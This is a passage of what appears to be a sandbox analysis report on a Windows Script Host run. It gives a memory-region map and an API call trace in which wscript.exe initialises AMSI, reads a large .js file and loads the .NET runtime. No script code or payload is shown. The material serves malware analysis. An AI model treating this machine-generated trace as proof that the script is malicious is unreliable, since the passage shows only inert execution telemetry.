filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1199
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1200
start_va = 0x7ffb3ca70000
end_va = 0x7ffb3cb14fff
entry_point = 0x7ffb3ca70000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1201
start_va = 0x7ffb30c90000
end_va = 0x7ffb30c9ffff
entry_point = 0x7ffb30c90000
region_type = mapped_file
name = "amsi.dll"
filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll")
Region:
id = 1202
start_va = 0x7ffb2dd10000
end_va = 0x7ffb2dd2cfff
entry_point = 0x7ffb2dd10000
region_type = mapped_file
name = "mpoav.dll"
filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll")
Region:
id = 1203
start_va = 0x7ffb2bea0000
end_va = 0x7ffb2beaffff
entry_point = 0x7ffb2bea0000
region_type = mapped_file
name = "wldp.dll"
filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll")
Region:
id = 1204
start_va = 0x7ffb39d40000
end_va = 0x7ffb39d50fff
entry_point = 0x7ffb39d40000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1205
start_va = 0x7ffb3a460000
end_va = 0x7ffb3a4b3fff
entry_point = 0x7ffb3a460000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 1206
start_va = 0x7ffb3a630000
end_va = 0x7ffb3a7f0fff
entry_point = 0x7ffb3a630000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1207
start_va = 0xabff260000
end_va = 0xabff2a7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000abff260000"
filename = ""
Region:
id = 1208
start_va = 0xabff620000
end_va = 0xabff71ffff
entry_point = 0x0
region_type = private
name = "private_0x000000abff620000"
filename = ""
Region:
id = 1209
start_va = 0x7ff6bd106000
end_va = 0x7ff6bd107fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bd106000"
filename = ""
Region:
id = 1210
start_va = 0x7ffb2dd00000
end_va = 0x7ffb2dd0bfff
entry_point = 0x7ffb2dd00000
region_type = mapped_file
name = "msisip.dll"
filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll")
Region:
id = 1211
start_va = 0x7ffb39260000
end_va = 0x7ffb39292fff
entry_point = 0x7ffb39260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1212
start_va = 0x7ffb39610000
end_va = 0x7ffb39626fff
entry_point = 0x7ffb39610000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1213
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1214
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1215
start_va = 0x7ffb3c5e0000
end_va = 0x7ffb3c64efff
entry_point = 0x7ffb3c5e0000
region_type = mapped_file
name = "coml2.dll"
filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll")
Region:
id = 1216
start_va = 0xab81400000
end_va = 0xab814fffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81400000"
filename = ""
Region:
id = 1217
start_va = 0x7ff6bd104000
end_va = 0x7ff6bd105fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bd104000"
filename = ""
Region:
id = 1218
start_va = 0x7ffb250c0000
end_va = 0x7ffb25169fff
entry_point = 0x7ffb250c0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll")
Region:
id = 1219
start_va = 0x7ffb2dce0000
end_va = 0x7ffb2dcfcfff
entry_point = 0x7ffb2dce0000
region_type = mapped_file
name = "wshext.dll"
filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll")
Region:
id = 1220
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1221
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1222
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1223
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1224
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1225
start_va = 0xab81500000
end_va = 0xab81506fff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81500000"
filename = ""
Region:
id = 1226
start_va = 0xab81510000
end_va = 0xab8151ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81510000"
filename = ""
Region:
id = 1227
start_va = 0xab81520000
end_va = 0xab8161ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81520000"
filename = ""
Region:
id = 1228
start_va = 0x7ffb25350000
end_va = 0x7ffb25393fff
entry_point = 0x7ffb25350000
region_type = mapped_file
name = "scrobj.dll"
filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll")
Region:
id = 1229
start_va = 0xab81620000
end_va = 0xab8171ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81620000"
filename = ""
Region:
id = 1230
start_va = 0xab81720000
end_va = 0xab8172ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81720000"
filename = ""
Region:
id = 1231
start_va = 0xab81730000
end_va = 0xab8192ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81730000"
filename = ""
Region:
id = 1232
start_va = 0xab81930000
end_va = 0xab81a3afff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81930000"
filename = ""
Region:
id = 1233
start_va = 0xab81930000
end_va = 0xab81a56fff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81930000"
filename = ""
Region:
id = 1234
start_va = 0xab81a60000
end_va = 0xab81b5ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81a60000"
filename = ""
Region:
id = 1235
start_va = 0xab81b60000
end_va = 0xab81c5ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81b60000"
filename = ""
Region:
id = 1236
start_va = 0x7ff6bcfdc000
end_va = 0x7ff6bcfddfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcfdc000"
filename = ""
Region:
id = 1237
start_va = 0x7ff6bcfde000
end_va = 0x7ff6bcfdffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcfde000"
filename = ""
Region:
id = 1238
start_va = 0xab81c60000
end_va = 0xab81d5ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81c60000"
filename = ""
Region:
id = 1239
start_va = 0x7ff6bcfda000
end_va = 0x7ff6bcfdbfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcfda000"
filename = ""
Region:
id = 1240
start_va = 0x7ffb239f0000
end_va = 0x7ffb23a57fff
entry_point = 0x7ffb239f0000
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 1241
start_va = 0xab81d60000
end_va = 0xab81e4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81d60000"
filename = ""
Region:
id = 1242
start_va = 0xab81d60000
end_va = 0xab81d66fff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81d60000"
filename = ""
Region:
id = 1243
start_va = 0xab81e40000
end_va = 0xab81e4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81e40000"
filename = ""
Region:
id = 1244
start_va = 0x7ffb23950000
end_va = 0x7ffb239e6fff
entry_point = 0x7ffb23950000
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 1245
start_va = 0xab81d70000
end_va = 0xab81d9bfff
entry_point = 0xab81d70000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\System32\\wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")
Region:
id = 1246
start_va = 0xab81e50000
end_va = 0xab81ffffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81e50000"
filename = ""
Region:
id = 1247
start_va = 0x7ffb22fb0000
end_va = 0x7ffb2394ffff
entry_point = 0x7ffb22fb0000
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")
Region:
id = 1248
start_va = 0xab81d70000
end_va = 0xab81d70fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81d70000"
filename = ""
Region:
id = 1249
start_va = 0x5c920000
end_va = 0x5c9e8fff
entry_point = 0x5c920000
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9185_none_88e323712fabe0b2\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9185_none_88e323712fabe0b2\\msvcr80.dll")
Region:
id = 1250
start_va = 0xab81d80000
end_va = 0xab81deffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81d80000"
filename = ""
Region:
id = 1251
start_va = 0xab81d80000
end_va = 0xab81d86fff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81d80000"
filename = ""
Region:
id = 1252
start_va = 0xab81de0000
end_va = 0xab81deffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81de0000"
filename = ""
Region:
id = 1253
start_va = 0xab81d90000
end_va = 0xab81d92fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81d90000"
filename = ""
Region:
id = 1254
start_va = 0xab81da0000
end_va = 0xab81da0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81da0000"
filename = ""
Region:
id = 1255
start_va = 0x20000
end_va = 0x3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1256
start_va = 0x7ffac3850000
end_va = 0x7ffac385ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac3850000"
filename = ""
Region:
id = 1257
start_va = 0x7ffac3860000
end_va = 0x7ffac386ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac3860000"
filename = ""
Region:
id = 1258
start_va = 0x7ffac3870000
end_va = 0x7ffac390ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac3870000"
filename = ""
Region:
id = 1259
start_va = 0x7ffac3910000
end_va = 0x7ffac391ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac3910000"
filename = ""
Region:
id = 1260
start_va = 0x7ffac3920000
end_va = 0x7ffac398ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac3920000"
filename = ""
Region:
id = 1261
start_va = 0xab81e50000
end_va = 0xab81f4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81e50000"
filename = ""
Region:
id = 1262
start_va = 0xab81ff0000
end_va = 0xab81ffffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81ff0000"
filename = ""
Region:
id = 1263
start_va = 0x7ff6bcfd8000
end_va = 0x7ff6bcfd9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcfd8000"
filename = ""
Region:
id = 1264
start_va = 0xab81db0000
end_va = 0xab81db0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81db0000"
filename = ""
Region:
id = 1265
start_va = 0xab81dc0000
end_va = 0xab81dcffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81dc0000"
filename = ""
Region:
id = 1266
start_va = 0xab82000000
end_va = 0xab99ffffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab82000000"
filename = ""
Region:
id = 1267
start_va = 0xab9a000000
end_va = 0xab9a6cffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab9a000000"
filename = ""
Region:
id = 1268
start_va = 0xab9a6d0000
end_va = 0xab9a7d7fff
entry_point = 0x0
region_type = private
name = "private_0x000000ab9a6d0000"
filename = ""
Region:
id = 1269
start_va = 0xab9a7e0000
end_va = 0xab9a8dffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab9a7e0000"
filename = ""
Region:
id = 1270
start_va = 0x7ff6bcfd6000
end_va = 0x7ff6bcfd7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcfd6000"
filename = ""
Region:
id = 1271
start_va = 0x7ffb220d0000
end_va = 0x7ffb22fadfff
entry_point = 0x7ffb220d0000
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\91a4b48cca231bafafe8b8b1de78487c\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\91a4b48cca231bafafe8b8b1de78487c\\mscorlib.ni.dll")
Region:
id = 1272
start_va = 0x7ff6bcf40000
end_va = 0x7ff6bcfcffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcf40000"
filename = ""
Region:
id = 1273
start_va = 0x7ff6bcf30000
end_va = 0x7ff6bcf3ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6bcf30000"
filename = ""
Region:
id = 1274
start_va = 0xab81dc0000
end_va = 0xab81dcffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81dc0000"
filename = ""
Region:
id = 1275
start_va = 0xab9a8e0000
end_va = 0xab9a9befff
entry_point = 0xab9a8e0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1276
start_va = 0xab81dd0000
end_va = 0xab81ddffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81dd0000"
filename = ""
Region:
id = 1277
start_va = 0x7ffac3990000
end_va = 0x7ffac399ffff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac3990000"
filename = ""
Region:
id = 1278
start_va = 0x7ffb20dc0000
end_va = 0x7ffb21468fff
entry_point = 0x7ffb20dc0000
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\58610f4b2168fbfdad44a42022ac83ad\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\58610f4b2168fbfdad44a42022ac83ad\\system.xml.ni.dll")
Region:
id = 1279
start_va = 0x7ffb21470000
end_va = 0x7ffb21e9ffff
entry_point = 0x7ffb21470000
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\042a21e47eb8693a9393028c639e93c6\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\042a21e47eb8693a9393028c639e93c6\\system.ni.dll")
Region:
id = 1280
start_va = 0xab81df0000
end_va = 0xab81df1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81df0000"
filename = ""
Region:
id = 1281
start_va = 0xab81e00000
end_va = 0xab81e00fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81e00000"
filename = ""
Region:
id = 1282
start_va = 0x7ffac39a0000
end_va = 0x7ffac39affff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac39a0000"
filename = ""
Region:
id = 1283
start_va = 0x7ffb21f40000
end_va = 0x7ffb220c2fff
entry_point = 0x7ffb21f40000
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")
Region:
id = 1284
start_va = 0xab81e10000
end_va = 0xab81e1ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81e10000"
filename = ""
Region:
id = 1285
start_va = 0xab81e20000
end_va = 0xab81e2ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81e20000"
filename = ""
Region:
id = 1286
start_va = 0xab81e30000
end_va = 0xab81e3ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81e30000"
filename = ""
Region:
id = 1287
start_va = 0xab81f50000
end_va = 0xab81f5ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81f50000"
filename = ""
Region:
id = 1288
start_va = 0x7ffac39b0000
end_va = 0x7ffac39effff
entry_point = 0x0
region_type = private
name = "private_0x00007ffac39b0000"
filename = ""
Region:
id = 1310
start_va = 0xab81f60000
end_va = 0xab81f6ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81f60000"
filename = ""
Region:
id = 1311
start_va = 0xab81f70000
end_va = 0xab81f7ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81f70000"
filename = ""
Region:
id = 1312
start_va = 0xab81f90000
end_va = 0xab81f9ffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81f90000"
filename = ""
Region:
id = 1313
start_va = 0xab81fb0000
end_va = 0xab81fbffff
entry_point = 0x0
region_type = private
name = "private_0x000000ab81fb0000"
filename = ""
Region:
id = 1314
start_va = 0xab81fc0000
end_va = 0xab81fd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000ab81fc0000"
filename = ""
Thread:
id = 107
os_tid = 0x250
[0045.451] __dllonexit () returned 0x7ffb23a9be30
[0045.451] __dllonexit () returned 0x7ffb23a9be40
[0045.451] __dllonexit () returned 0x7ffb23a9be60
[0045.451] __dllonexit () returned 0x7ffb23a9be80
[0045.451] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xabfe9fc630, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\wscript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
[0045.451] _splitpath_s (in: _FullPath="C:\\Windows\\system32\\wscript.exe", _Drive=0x0, _DriveSize=0x0, _Dir=0x0, _DirSize=0x0, _Filename=0xabfe9fc7b0, _FilenameSize=0x104, _Ext=0x0, _ExtSize=0x0 | out: _Drive=0x0, _Dir=0x0, _Filename="wscript", _Ext=0x0) returned 0x0
[0045.452] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0xabfe9fc798 | out: phkResult=0xabfe9fc798*=0x0) returned 0x2
[0045.454] GetVersion () returned 0x2800000a
[0045.455] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffb3d260000
[0045.455] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="QueryProtectedPolicy") returned 0x7ffb3a86d460
[0045.455] VirtualProtect (in: lpAddress=0x7ffb23af6668, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0xabfe9fc8e0 | out: lpflOldProtect=0xabfe9fc8e0*=0x2) returned 1
[0045.455] VirtualProtect (in: lpAddress=0x7ffb23af6668, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xabfe9fc8e0 | out: lpflOldProtect=0xabfe9fc8e0*=0x4) returned 1
[0045.456] GetUserDefaultLCID () returned 0x409
[0045.456] GetACP () returned 0x4e4
[0045.456] LoadLibraryExA (lpLibFileName="amsi.dll", hFile=0x0, dwFlags=0x0) returned 0x7ffb30c90000
[0045.457] GetProcAddress (hModule=0x7ffb30c90000, lpProcName="AmsiInitialize") returned 0x7ffb30c92260
[0045.457] GetProcAddress (hModule=0x7ffb30c90000, lpProcName="AmsiScanString") returned 0x7ffb30c926b0
[0045.457] AmsiInitialize () returned 0x0
[0045.460] GetCurrentThreadId () returned 0x250
[0045.460] GetCurrentThreadId () returned 0x250
[0045.460] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0xabfe9fed58 | out: phkResult=0xabfe9fed58*=0x168) returned 0x0
[0045.460] RegQueryValueExA (in: hKey=0x168, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0xabfe9fed50, lpData=0xabfe9fed48, lpcbData=0xabfe9fed40*=0x4 | out: lpType=0xabfe9fed50*=0x4, lpData=0xabfe9fed48*=0x1, lpcbData=0xabfe9fed40*=0x4) returned 0x0
[0045.460] RegCloseKey (hKey=0x168) returned 0x0
[0045.460] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffb3a800000
[0045.460] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffb3a85a1b0
[0045.461] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffb3a8be790
[0045.461] ResolveDelayLoadedAPI () returned 0x7ffb3ccf7000
[0045.461] CoCreateInstance (in: rclsid=0x7ffb23af8c30*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb23af8c40*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xabfe9fed00 | out: ppv=0xabfe9fed00*=0x7ffb3cea6e80) returned 0x0
[0045.463] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0xabfe9fece0, nSize=0x27 | out: lpBuffer="") returned 0x0
[0045.463] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0045.463] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0xabfe9fed80, cchData=6 | out: lpLCData="1252") returned 5
[0045.463] IsValidCodePage (CodePage=0x4e4) returned 1
[0045.463] CoCreateInstance (in: rclsid=0x7ffb23afa7b8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb23afa7a8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xabfee46878 | out: ppv=0xabfee46878*=0xabfec16090) returned 0x0
[0045.463] IUnknown:AddRef (This=0xabfec16090) returned 0x2
[0045.463] GetCurrentProcessId () returned 0x33c
[0045.464] GetCurrentThreadId () returned 0x250
[0045.464] GetTickCount () returned 0x1dcfd
[0045.464] ISystemDebugEventFire:BeginSession (This=0xabfec16090, guidSourceID=0x7ffb23af7ea0, strSessionName="JScript:00000828:00000592:18122109") returned 0x0
[0045.464] GetCurrentThreadId () returned 0x250
[0045.464] GetTickCount () returned 0x1dcfd
[0045.464] GetCurrentThreadId () returned 0x250
[0045.521] GetVersionExA (in: lpVersionInformation=0xabfe9fd180*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xabfe9fd180*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0045.521] GetUserDefaultLCID () returned 0x409
[0045.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0xabfe9fccf0, cchData=2 | out: lpLCData="") returned 2
[0045.521] IsFileSupportedName () returned 0x1
[0045.521] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
[0045.521] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
[0045.521] _wcsicmp (_String1=".js", _String2=".js") returned 0
[0045.524] GetSignedDataMsg () returned 0x0
[0045.524] GetCurrentProcess () returned 0xffffffffffffffff
[0045.524] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xabfe9fd9e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xabfe9fd9e0*=0x1f0) returned 1
[0045.524] GetFileSize (in: hFile=0x1f0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4707e
[0045.525] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0045.526] ReadFile (in: hFile=0x1f0, lpBuffer=0xab81520080, nNumberOfBytesToRead=0x4707e, lpNumberOfBytesRead=0xabfe9fd9a0, lpOverlapped=0x0 | out: lpBuffer=0xab81520080*, lpNumberOfBytesRead=0xabfe9fd9a0*=0x4707e, lpOverlapped=0x0) returned 1
[0045.527] CoInitialize (pvReserved=0x0) returned 0x1
[0045.527] CoCreateInstance (in: rclsid=0x7ffb2dcee7f8*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb2dcee808*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0xabfe9fd900 | out: ppv=0xabfe9fd900*=0xab81567570) returned 0x0
[0045.626] __dllonexit () returned 0x7ffb2535bcd0
[0045.626] __dllonexit () returned 0x7ffb2535bcf0
[0045.627] GetVersionExA (in: lpVersionInformation=0xabfe9fb310*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7ffb, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x2535bcf0, szCSDVersion="û\x7f") | out: lpVersionInformation=0xabfe9fb310*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0045.627] GetProcessWindowStation () returned 0x70
[0045.627] GetUserObjectInformationA (in: hObj=0x70, nIndex=1, pvInfo=0xabfe9fb2f8, nLength=0xc, lpnLengthNeeded=0xabfe9fb2f0 | out: pvInfo=0xabfe9fb2f8, lpnLengthNeeded=0xabfe9fb2f0) returned 1
[0045.627] DllGetClassObject (in: rclsid=0xabfec1e370*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7ffb3ce2f7c0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xabfe9fc350 | out: ppv=0xabfe9fc350*=0xab81567160) returned 0x0
